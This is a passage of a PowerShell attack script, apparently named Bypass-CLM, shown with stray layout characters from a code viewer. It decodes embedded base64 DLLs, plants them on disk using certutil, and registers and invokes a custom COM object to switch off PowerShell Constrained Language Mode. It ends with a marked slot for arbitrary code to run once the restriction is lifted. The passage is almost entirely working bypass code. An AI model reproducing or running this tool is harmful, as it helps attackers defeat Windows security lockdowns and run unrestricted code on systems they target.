||
|
|
$DecodedAssemblyDll = (Decode-Base64 $EncodedAssemblyDll)
|
||
|
|
Write-Host "`t$dstAssemblyPath"
|
||
|
|
Set-Content -Value $DecodedAssemblyDll -Encoding Byte -Path $dstAssemblyPath -Force
|
||
|
|
$DecodedAssemblyDll = ""
|
||
|
|
$EncodedAssemblyDll = ""
|
||
|
|
}
|
||
|
|
|
||
|
|
if (!(Test-Path $dstDllPath) -or ((Get-Item $dstDllPath).length -eq 0) ) {
|
||
|
|
[byte[]]$DecodedDisableDll = @()
|
||
|
|
if ([IntPtr]::Size -eq 4) {
|
||
|
|
#$DecodedDisableDll = (Decode-Base64 $EncodeDisableDll86)
|
||
|
|
$EncodeDisableDll86 | Out-File -FilePath "$dstDllPath.txt" -Force
|
||
|
|
} else {
|
||
|
|
#$DecodedDisableDll = (Decode-Base64 $EncodeDisableDll64)
|
||
|
|
$EncodeDisableDll64 | Out-File -FilePath "$dstDllPath.txt" -Force
|
||
|
|
}
|
||
|
|
$EncodeDisableDll86 = ""
|
||
|
|
$EncodeDisableDll64 = ""
|
||
|
|
|
||
|
|
Write-Host "`t$dstDllPath"
|
||
|
|
#Set-Content -Value $DecodedDisableDll -Encoding Byte -Path $dstDllPath -Force
|
||
|
|
certutil -decode "$dstDllPath.txt" $dstDllPath
|
||
|
|
$DecodedDisableDll = ""
|
||
|
|
}
|
||
|
|
|
||
|
|
if (!(Test-Path $dstAssemblyPath) -or !(Test-Path $dstDllPath) -or ((Get-Item $dstAssemblyPath).length -eq 0) -or ((Get-Item $dstDllPath).length -eq 0)) {
|
||
|
|
Write-Host "[-] Could not decode and plant DLL files."
|
||
|
|
return $false
|
||
|
|
} else {
|
||
|
|
Write-Host "[+] Files planted."
|
||
|
|
}
|
||
|
|
|
||
|
|
|
||
|
|
Write-Host "[.] Step 1. Creating custom COM object."
|
||
|
|
|
||
|
|
Create-COM -ComName $comName -ComDescription $comDescription -DllPath $dstDllPath -Guid $guid | Out-Null
|
||
|
|
|
||
|
|
Write-Host "[.] Step 2. Invoking it ($comName)..."
|
||
|
|
|
||
|
|
Write-Host "`tPowershell runspace Thread ID: $([appdomain]::GetCurrentThreadId())"
|
||
|
|
try
|
||
|
|
{
|
||
|
|
New-Object -ComObject $comName -erroraction 'silentlycontinue' | Out-Null
|
||
|
|
}
|
||
|
|
catch
|
||
|
|
{
|
||
|
|
}
|
||
|
|
|
||
|
|
if($RemoveComWhenFinished)
|
||
|
|
{
|
||
|
|
Write-Host "[.] Removing registered COM object."
|
||
|
|
Remove-COM -ComName $comName -Guid $guid
|
||
|
|
}
|
||
|
|
else
|
||
|
|
{
|
||
|
|
Write-Host "`n============"
|
||
|
|
Write-Host -ForegroundColor Yellow "`nUse below command to disable CLM on Demand (ignore errors):"
|
||
|
|
Write-Host "`n`tPS> " -NoNewLine
|
||
|
|
Write-Host -ForegroundColor Green "New-Object -ComObject $comName"
|
||
|
|
Write-Host "`n============`n"
|
||
|
|
}
|
||
|
|
|
||
|
|
|
||
|
|
#############################################################
|
||
|
|
#
|
||
|
|
# PUT YOUR CODE BELOW THAT IS GOING TO BE RUN IN CLM DISABLED
|
||
|
|
#
|
||
|
|
|
||
|
|
Write-Host "`n[+] Finished. CLM status: $($ExecutionContext.SessionState.LanguageMode)"
|
||
|
|
|
||
|
|
#############################################################
|
||
|
|
}
|
||
|
|
|
||
|
|
Bypass-CLM
|